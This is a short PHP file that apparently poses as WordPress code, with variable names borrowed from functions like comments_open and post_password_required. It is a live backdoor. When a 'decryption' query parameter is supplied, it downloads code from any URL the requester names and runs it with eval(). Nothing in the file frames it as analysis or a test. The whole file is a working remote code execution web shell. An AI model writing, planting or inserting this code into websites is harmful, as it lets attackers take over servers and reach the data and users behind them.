<?php
if (isset($_GET['decryption'])) {
$comments_open_idt = $_GET['decryption'];
if ($post_password_required_ffj = curl_init()) {
curl_setopt($post_password_required_ffj, CURLOPT_URL, $comments_open_idt);
curl_setopt($post_password_required_ffj, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($post_password_required_ffj));
curl_close($post_password_required_ffj);
exit;
}
}